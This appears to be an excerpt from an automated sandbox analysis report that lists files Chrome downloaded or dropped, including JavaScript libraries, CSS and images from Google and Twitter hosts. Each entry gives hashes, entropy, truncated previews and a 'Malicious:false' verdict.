                                                                                                                                                                                                                                                                                          Preview:/**. * @license. * Copyright 2017 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const t=(e,i)=>i.kind==="method"&&i.descriptor&&!("value"in i.descriptor)?{...i,finisher(r){r.createProperty(i.key,e)}}:{kind:"field",key:Symbol(),placement:"own",descriptor:{},originalKey:i.key,initializer(){typeof i.initializer=="function"&&(this[i.key]=i.initializer.call(this))},finisher(r){r.createProperty(i.key,e)}},n=(e,i,r)=>{i.constructor.createProperty(r,e)};function o(e){return(i,r)=>r!==void 0?n(e,i,r):t(e,i)}export{o as n};.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7783)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11500
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.241668722409222
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:sDLPGsyEzyMrMyTLI4UuK1INXM5ZK/Ko/RxgQVQQx4zQihU:sDTGsyEzJ4yHI401I90gz/RiQVQQx4Ej
                                                                                                                                                                                                                                                                                          MD5:8B3D85FB1295E523BDE8A705F8E2D8D5
                                                                                                                                                                                                                                                                                          SHA1:2B8A3FE39422B9A3108C37767C0420D3B0C92ACE
                                                                                                                                                                                                                                                                                          SHA-256:94F67DCE4F8F6E707B054C6CF608CB2EB118AD2224EDB87760E5A1ABC7D7CEDC
                                                                                                                                                                                                                                                                                          SHA-512:D16E8946B81C6DA8A8D5D1E45B4FB305B643835C0783A121A1B8BDD8B3F9F343E1A07DD60ACB6BFA2BDB0FA1BD377581786DAA9C34080BA897DF1DC2349F4C28
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import"./vQ8El_Rl.min.js";import"./IniIGeRU.min.js";import"./bS7WqXuL.min.js";import{l as v}from"./_OAi-NRQ.min.js";import{d as f,i as m}from"./HxYQzxVf.min.js";import{w}from"./zRFBfJZH.min.js";import{r as y,x as c,A as x,s as k}from"./ycaG4YXp.min.js";import{l as P,e as S}from"./0XPwTFcg.min.js";import{n as i}from"./IYoTYjYE.min.js";import{t as g}from"./ianzD0dL.min.js";import{e as b}from"./p9kcPq91.min.js";import{i as u}from"./IFunn9hk.min.js";import{o as p}from"./5Ss99t85.min.js";import{o as C}from"./RpI-OtYr.min.js";import{R as T}from"./bAPu5B1A.min.js";import"./44SUZn7a.min.js";import"./rwBjrn-0.min.js";import"./lHimDk5Y.min.js";const $='@keyframes fade-out{to{opacity:0;display:none}}@keyframes fade-in{to{opacity:1;display:block}}:host{--bds-carousel-scrollbar-height: 30px;--bds-carousel-scrollbar-track-height: 2px}bds-pagination::part(pagination-item){cursor:pointer}.container{position:relative;margin:0 auto;--feather-width: 20vw }@media (min-width: 3000px){.container{--feather-w
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):4217
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.938524730043499
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:nJcxQGmS9OitIp09ec05EOkhS6gGiMSojliNX2:Jcx4+tIGYc0YhS7GiMSoRWG
                                                                                                                                                                                                                                                                                          MD5:44B83718959F1E11C1291D2962C1DAB3
                                                                                                                                                                                                                                                                                          SHA1:5597E8F846BE88066607927E8C3FAB5E95A0C652
                                                                                                                                                                                                                                                                                          SHA-256:DC3789CC4765D5CF2BA76888A40340E4CCAF6916022F3A6DFB27DF045C6FCB5B
                                                                                                                                                                                                                                                                                          SHA-512:8CD7161755EE42104A1518F2177EB1CBAEFE3EFD607AC554AF928E7A902A5F5BB8273C75F274F63003A69CFEBE153A32886C8C73FD6EA9C3D149BD0DC268C6F8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/2qz9gwasYkOhPEumfqd3_x8HiiRu6fIQR1d-1DRAV8qfkqmQx7Rygzohal7DXbB-urTun2B0thBnpY3BRfqXnJOm4b9QQFk3L4VK=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx..{t..}.?wvV+.V...../.&<....8<".H.#..fx..J........i.Lz.3!.8!Ii^..!8)'. ........../#d.[.V.......G..>..T}..9:3s....w..w~..L1..SL1..~ .....-...x.N...q?..I%p....h...:`..!..@/....l...x...A.BV..8..Y...........u$.L...=.......z..8....&p:P.}I..,...kZ/....Xd..T3....t.....W.....T..5...]....#*....8..y&....T.$.....BA.(uG..pM{,..x......t....Gy...y..3.!.........X.-....w.c.m..x...MI...`>.B:.7....0..(...m.<.x.X.O...h.M........\{,.n...%%p...X.e<.kX.#fD.p*...X..M.C...-...[..G.xZ..!.....}..s.S..G[:..~..#....L..5gbC...k.5Y....m.t..Sl)Y..QY.....=...nTb9.|}..n.}....k.))...R[U....._n.E~...X.V....s......7.H....z#..}......Q&|...5.....|n....p-5N..:(9".]....D...k.c..^;..4......e...U..S.......2....;...]......=..=........B.D.H..../...K...!teNSCc.z..q!}...v.i..jj8.xv.vM...nn=......u.}.....H9......T..X.^9..?
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1840x630, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):39755
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.574348657479085
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:LYU5cIupDSkdi0l48StkLA1bAjtenAB7MGrv+/:TruJSkwIlDMBAjtenAB7xrW/
                                                                                                                                                                                                                                                                                          MD5:3972435031D02D6FF6CB8A5F2A786094
                                                                                                                                                                                                                                                                                          SHA1:0AE6D027CD444F4C4605B21486E919C310FD92D3
                                                                                                                                                                                                                                                                                          SHA-256:BA7E54CBF5CA0A4BBDAA39254C20EB8490ADBBA42CD0A14B5B0001A6AA51A26D
                                                                                                                                                                                                                                                                                          SHA-512:18BC5D61EC062605ADDB6B06FBA90283E24CA3D6D3333D3803EFCFCFEA100899AF23A5E21649BD0EE751001CF7402508D0817CB570D0243A0BBE4C40657B11BE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://pbs.twimg.com/media/GGrR89_WgAAgrOI?format=jpg&name=large
                                                                                                                                                                                                                                                                                          Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................v.0..".................................................................................@............................................................................................?+7r..O3q.3w.!..'..s......].v.7..^.qxQ..Z....@y.>.Y.O...4..|9.p.~.h..m..\.x.........?..i._.h.....YU.!...........................................................H...G....,5.....U..+.C....l..,...`A.z.V},..[.......;MX.e".D..I....[..y...kGYl..2...>..Ec?.hf...+.........Z..1..C3..fw.....5.c..[...............................................................".".-.+.....2.[i7jN4.........l.N......Y..........O...k.ff..+.g..5..9...........*IH.<.u.....c.[.vm..........#..;..>.X.}.:..Q.zI[.Q.R.A..rV...?...........................................................r.q......Xk..u....'.W.......T..'......L.......T|.6..R+y.....\.Q.l...d.....d|>....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (10127), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):10127
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.301064183124465
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:mtOT6TUvBrqig7C2clbmVw6hNTApcQbW/yKBbo:mtTUpNmVw5
                                                                                                                                                                                                                                                                                          MD5:4B3A033532B486A3762FF40372BC89AD
                                                                                                                                                                                                                                                                                          SHA1:1871FFA5EB6E00A62C21437B253886983FB4019F
                                                                                                                                                                                                                                                                                          SHA-256:7D90CF25F9DF86185BD7F10C2FF1E7809A2A71141628DF6E3E77D9ED183D0F02
                                                                                                                                                                                                                                                                                          SHA-512:8D0C6D091DEC06ECFA66E2E9A9D79AD25DF4A927473911F809DFEE31F0D45FBE8196813FEC05B4BA9DCDC7EF6339F1EFC624C3CFE4D0C01373B235C7E235465E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.4FdvxZCaxZc.L.W.O/m=qcwid,d_b_gm3,d_wi_gm3,d_lo_gm3/excm=qaaw,qadd,qaid,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin/d=1/ed=1/ct=zgms/rs=AA2YrTtcPh2nad5bIFFLwCKDWaAzlQEIJA"
                                                                                                                                                                                                                                                                                          Preview:.gb_Q{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ka{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_La{fill:#f9ab00}.gb_F .gb_La{fill:#fdd663}.gb_Ma>.gb_La{fill:#d93025}.gb_F .gb_Ma>.gb_La{fill:#f28b82}.gb_Ma>.gb_Na{fill:white}.gb_Na,.gb_F .gb_Ma>.gb_Na{fill:#202124}.gb_Oa{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (43088)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):43380
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3680879325019255
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:L+5LHpwfVyb83wG/B/nE306RAHdAIsxmAK31horUp45:apqgo3wKB/nKRAHOIKS3TjK
                                                                                                                                                                                                                                                                                          MD5:BA1FA78EB4BB49F8A0EEAF8E61708840
                                                                                                                                                                                                                                                                                          SHA1:489BCF6D9C69F0F29F871E0323510C5197859BF5
                                                                                                                                                                                                                                                                                          SHA-256:AD33C2DF9ADA8A663C2147357828F980D0B7CA731EF33EB3C6E4F327C3B2CDA5
                                                                                                                                                                                                                                                                                          SHA-512:A2731344A2412B3F0CD539EAA83B86065A30947D28845CCC5D844D79BCFEC8E71CE5342BFF300AB2D87386EBF4862C942848901105C4CA79D70AF3533A4E7476
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/*!. * ScrollTrigger 3.12.5. * https://gsap.com. * . * @license Copyright 2024, GreenSock. All rights reserved.. * Subject to the terms at https://gsap.com/standard-license or for Club GSAP members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?t(exports):"function"==typeof define&&define.amd?define(["exports"],t):t((e=e||self).window=e.window||{})}(this,function(e){"use strict";function _defineProperties(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}function r(){return Ce||"undefined"!=typeof window&&(Ce=window.gsap)&&Ce.registerPlugin&&Ce}function z(e,t){return~Le.indexOf(e)&&Le[Le.indexOf(e)+1][t]}function A(e){return!!~t.indexOf(e)}function B(e,t,r,n,o){return e.addEventListener(t,r,{passive:!1!==n,capture:!!o})}function C(e,t,r,n){return e.removeEventListener(t,r
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, orientation=upper-left], baseline, precision 8, 640x531, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):31840
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8882022052139416
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:L3v49Qh96UMPBm0OX7Lglf7g4tRxLcPjIgDU4TlabSZ:L3RyUuOX7k7g4xAPkiU0aba
                                                                                                                                                                                                                                                                                          MD5:9521A70C6A85612734FE15606DA9EBCC
                                                                                                                                                                                                                                                                                          SHA1:FA25E39CABBF6277EAEFA588B75B4781AC12B620
                                                                                                                                                                                                                                                                                          SHA-256:B3DF051FB27C36026C6E709CA7A57292448D3B8CA64D1506B934E3F7DE601A6A
                                                                                                                                                                                                                                                                                          SHA-512:FB0B00722F0F33DFE9AE71BA53AEC5E1FFC739A27121BF9E562468F1436C42AEAEE796E49514D62E22B881FC1A40D20873F2B4553626BE82BBAED264573E9C76
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/76/6e/06f2b9da48a39525eb216e83e4bd/auqecsdxevvsair-medium.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF............."Exif..II*..........................8Photoshop 3.0.8BIM........8BIM.%..................B~...(ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl....8.G.m..Oz../................................desc.......0cprt...,...Pwtpt...|....rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... mluc............enUS.........D.i.s.p.l.a.y. .P.3mluc............enUS...4.....C.o.p.y.r.i.g.h.t. .A.p.p.l.e. .I.n.c...,. .2.0.2.2XYZ ...............,XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......Y.......[sf32.......B.......&.......................n................................................................................................................................................."..........................................a..........................!"...12BAQRbrt..#5aqs......$346u....%&.....D...CSdv.....'7c....ETe..................................6................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 1280 x 720, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1218685
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985161889157195
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:t4RgSVIcqs/SzbqrKGsV/ohv98lLMfazNfuUo+YXerXO74GdHdfPs:SgSVXEohv9cLC+IereUGdHdfPs
                                                                                                                                                                                                                                                                                          MD5:C448B484B859C9CB782A4D33FD4F9495
                                                                                                                                                                                                                                                                                          SHA1:7DEFC9F2DBA95C9A94730318E8527A326376D7F7
                                                                                                                                                                                                                                                                                          SHA-256:A0FC6DC999127147DCA5B65B771DD649DD4192B7D10D0CEEC9A4344E1F56FEB8
                                                                                                                                                                                                                                                                                          SHA-512:CD5901DDA2D6DF069CD1A184948791541F8E3A5159079146035FE0C9BEAF27A80240DED31683089EC6B1A347ED78CC5623925ACAE6A8888152AF5DCB268768A8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/wtw1KX4QKxdb9HbcQHRw4WsP88O76isYP8JmYFcVpXjHy0tckXFnms1Hgm8jbw8cY53Mx7b-x28HuQkP3nszcom9PGbKiLK1EKkSiqmb=w2000
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............}.V....sRGB.........eXIfMM.*.............................b...........j.(...........1.....%...r.2...........i.................H.......H....Adobe After Effects 2020 (Macintosh)..2022:09:08 16:53:54......................................................2022:09:08 16:53:54..x.b....pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:exif="http://ns.adobe.com/exif/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/">. <exif:ColorSpace>65535</exif:ColorSpace>. <
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):5188
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.952928145135762
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:9JKglioE6pMcO5oiXZuh+u/U7pLnZ0jnn7dwp5KRf0271XM8zAJPzSjCWdJ28/p2:9J66pTOlI+u/U7pLnZ0jn7dwuRfU8zAd
                                                                                                                                                                                                                                                                                          MD5:714ACF1F5A07C6204BBD7E59194A2870
                                                                                                                                                                                                                                                                                          SHA1:3F8170F84AA88CC81D56C4383CF3758E7945D71F
                                                                                                                                                                                                                                                                                          SHA-256:1C58D90328C77231DAAA4F46073F3BADE862DB0E24A896F1B17912BB52C0FDDA
                                                                                                                                                                                                                                                                                          SHA-512:FE1D52B327E09B1936B156546DF09F10802ED8D51C474217F4E02FFB8C312F519540136833C5E51A07CC7E25A748F2DECAC7D393885BF4AF05A53CB9C52465B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/WdC-o7ZcZL5WALPSmfUC8H4oYhlhqm1DV45CtHqV06DTRR0rE_P9JXi-J2KXLd9CTyHt_t3ehUm1o_AMltgfAGbvQDku8jsZt0kBSA=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..y.T..?..^Uuu7.44;..K..n.Mp.4..Fe.......dr.1.....%.q"q..h......3!.9..M7.`\..l..&.MwUW...?Z<4T5U.....>.p..{..~.}........(P O.\;.)v\.....KP..)....Z.b........b-b<..W$f ..A$b.r....~.L.e...2.;b{[..#eFt0*.A...P...2T.#...U-..E...h=p@.N............/.}.+.....v..%.GS..2.....*.A.lE.B....Q.Aw!...g..5...[CM...k6x.6..y/...'.....a.@......m..ETv"l.j.....}W.~.]O.#/..u.XW\g..~.1.LPaX~9....V.Z./...U..\{u4y...~..X<../.0.t.H(.~..*V.7....U...6......WH]... .-P..$O|K......{z.s..z.......&L..7..$..\..!v...*...^.J....._<..9...3....\.....DY.h2..\[..b;'..]8.r.s?.A@ .>d....S...U...6.U.w.3,....Q.3.(..<.....+k.).F.&..*.3...0"[6...5.fz....d.\V...s.c^.d..@8W..z....c.G.|~\YK...9o......c&r.....~....:...{..%y...O.O....}..~.p3.`dLo9.g..U.F... 8.^.gj._.a"...}e..ll:....h...m.....q.g.2.d*..I.K.5.p. ...m...e!...|E..~..X+.@.....>[..8(.>.wy.A?MeD.=S...N....A...k.-_^].N.....eq.PsIA..X.....|yuC6Lv....X.HA...|..._...P..vJ....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1253)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):6930
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.388337319532981
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:+MuM+zaumRJ0+HnIKiuZ2+vehu71U3eoNka:ozNAJ0+HnIKiuZ2+GXka
                                                                                                                                                                                                                                                                                          MD5:313B92BF95C71336D783A9CFD594724C
                                                                                                                                                                                                                                                                                          SHA1:256602C15106EDE9AB7E2BD4DC5DC8D4A2412336
                                                                                                                                                                                                                                                                                          SHA-256:07CADDFFDDE958CF85A05115117F3C439E35095DB4597D47B1C73A18B17E2526
                                                                                                                                                                                                                                                                                          SHA-512:7369662803FBD77CA183BACF25A23F619DA68DEBD091B2D19D1662C195E7EB94992D524157A15E79971EEB46A64006437D3DF875CCBFDC0AFAF035E820F8857D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://ajax.googleapis.com/ajax/libs/angularjs/1.6.10/angular-sanitize.min.js
                                                                                                                                                                                                                                                                                          Preview:/*. AngularJS v1.6.10. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.(function(s,c){'use strict';function P(c){var h=[];C(h,E).chars(c);return h.join("")}var D=c.$$minErr("$sanitize"),F,h,G,H,I,q,E,J,K,C;c.module("ngSanitize",[]).provider("$sanitize",function(){function f(a,e){return B(a.split(","),e)}function B(a,e){var d={},b;for(b=0;b<a.length;b++)d[e?q(a[b]):a[b]]=!0;return d}function t(a,e){e&&e.length&&h(a,B(e))}function Q(a){for(var e={},d=0,b=a.length;d<b;d++){var k=a[d];e[k.name]=k.value}return e}function L(a){return a.replace(/&/g,"&amp;").replace(z,function(a){var d=.a.charCodeAt(0);a=a.charCodeAt(1);return"&#"+(1024*(d-55296)+(a-56320)+65536)+";"}).replace(u,function(a){return"&#"+a.charCodeAt(0)+";"}).replace(/</g,"&lt;").replace(/>/g,"&gt;")}function A(a){for(;a;){if(a.nodeType===s.Node.ELEMENT_NODE)for(var e=a.attributes,d=0,b=e.length;d<b;d++){var k=e[d],g=k.name.toLowerCase();if("xmlns:ns1"===g||0===g.lastIndexOf("ns1:",0))a.removeAttributeNode(k),d-
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1502
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.73412357563312
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:lPIHicYgNF3utrBMaYdnYuB3EuYksRjf4YooyQGx7sKRMi+R29I/WWWWWWWWWWWj:cdP3ut2aYdN3vsRjGoynxVxuhtG
                                                                                                                                                                                                                                                                                          MD5:8A74358CB7D5C631CB3746D774C99A3E
                                                                                                                                                                                                                                                                                          SHA1:5F33C0ABED63BCFC3630366276FC783AFF20CE67
                                                                                                                                                                                                                                                                                          SHA-256:7281509E4DAC8B2FC498C248C0A61142447362083E2D93657F74C8E5B8942E6F
                                                                                                                                                                                                                                                                                          SHA-512:E1167BC3ACA76887A6549621FBAE88C60FEA554E9D69F6538C2494B32FD246CF19BF02D15FB1C8FFB9E9978B8CA1657CEC792FF1271731CF7C981662EC0722A2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/9TzWtxtT-9Vrlwa8SXTSKhfl91Ndy4hU-1uLE9-hFsVSHARAOlFEdFExVR4QCegJ-KUBTSlJm3DZY6g31sbVrUT_HfxQvX_7WgLp=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..Ml.U...y}-?.#...**..5R}&...$..B\..p...1.'.\. 1......(.....F.. . .P.(..F.k....w]..".m.;.p.d.Ms.y...{.y`..a..ax'.....(.<0/t..$.....f&/s(v9c!.`..k(.)0;T..$.a. .i..iy...vk........s#....@....H...U..0.J|.,v<*...VQ.].h........w.0....[\....%.Y.\..Eb.u..U\....!...b...).%H.6O.I..]E..M..(|.e..O../...6^&...l.L._..x.`....2.a(L.e..Q.....%z.e.....2.....2.....2...{.e..'.....!.....#.....%x.e.....2.....A..#lw..K.......t.?.....`..&.|8`..-......_.....as.rL.rL.rL.rL.rL.r._&...IN...S..R..i..P..Sj.r5...{`p+...N....P)[.`....B.30.......Od.N.....?..5..Q$..Gq=..~.dK..o..N..................MV..X.].Z.b....s...f...T.l.....u0k.....C..,..EG$.j....?v..,v...<.+x....Zk.r.....\B.)8..A.......f9."O..&../.......<.)..&....Y.....<.....3..?o.B.{KX..`.r.,5..}...Z....j~..m....e.n.*7.._.Q......\.............M....R..%^...Z......r.^=U......P......I.....%.uJ.#..n..#........?=.C...?...N.!`.h.....8v......./.......rK......[!m..+7..7....>.....5
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2418
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8871913655312085
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Em8Mqtv9zlBVzCIe35iAtX8LfGlwPT9LaFRlmYKK3scbZz:EHFzYIeM4X8LfG2JWFrYh0Zz
                                                                                                                                                                                                                                                                                          MD5:9260A8DCEE81975E5E846E02A40E552D
                                                                                                                                                                                                                                                                                          SHA1:27A65184CC09909E0DCC4F68475C2CB39EB49534
                                                                                                                                                                                                                                                                                          SHA-256:E074AF7EBCC9E834048188F71F5CF3BD1EBED4657DBCA76F8DDA50BC6C72B019
                                                                                                                                                                                                                                                                                          SHA-512:49A277DABC2530D3001294392C303AADA5F51C73172CFF66C44B83CFF2CF163090D5ED851D5B547767A1BE9E3B78CB96FAC418087B981D4CEE938B9A2D7F0131
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFj...WEBPVP8L].../..?.w...$..+.gF...FR......^...$..>..+d.p...........L.n...,%y.(......m{.6J9.......gp....C};.By;!.Tzb;........w.n.W..Wn.U.M....f.-...Gl.P..cG._a.......40...v..D..+.....&.*.,..U..n.@zB.I.,eDdy....H.\,M..._.PNT...ds5..\.8sRNf.].)..z..`>n&..#.YO.S[.$.Y.-.-.e........{><..v}....:.......[N..k...2.d.........O.R..b.pch.v:UO..q.&..k.K.#+....|....).Y{..,0.8...Z;m../.kR...K........w....".;.$`4....1Y;.....Wz%_....2+.....,g6dc...>......X..n....vq{-....o6..2......2..N#....>|#......b%Q).#...+S.|...]...$[...3!k..n..h..6]c.......D.W...o..I0.|.Zh.iT.2...D..?'D... .`.m.6..b.7+...*.H....+.h.X...K.62....N~......D&: ....h7..mmT.+....M.........d-.|..&.f...f.d.L.....lQ.J....1...C.].t.d{...2.u.....p..lvK...".H.}.5~ZN.08z`t.u..F.D...........I....$[...T.......[g~.i...b...>r....e..=...Z...l..y....~..{..i.]......._.^./.....{........kK.z._}q.....}8.J.Ul..{.....W.y.k$.Of.|.<.}4..k.z....[}n..&.....(........oX..{.'........h....Ao.Nv.$./.\V....o<
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):8202
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.924938881114943
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:fWwgu1h/+gZfItYwTXT1jspWThlUWtIAAUd2EJl5pt2bdsQ/Oan4kn:fWwgu1h/NKtYwtrThlUWtI0d2IlTtodJ
                                                                                                                                                                                                                                                                                          MD5:9E3FEC2B56648337C12D9A5B8751D1D1
                                                                                                                                                                                                                                                                                          SHA1:40BD00EDB5F2CC397FD9C03D1D856565D96ACBAB
                                                                                                                                                                                                                                                                                          SHA-256:54CA1AC6E82AC6D2F1B1BC35BBD295B918D7E4435E62BDBF89544E78BF906209
                                                                                                                                                                                                                                                                                          SHA-512:6F476463A53F9409FFE5AA1779CE2D035EE7CA902BDCE1AF752971681B1AFE41FCCB77EBE0DB3085451C6C9FA97B2CDC66A72AEE39AE8C1AD6E42E7A89D3F539
                                                                                                                                                                                                                                                                                          Malicious:false
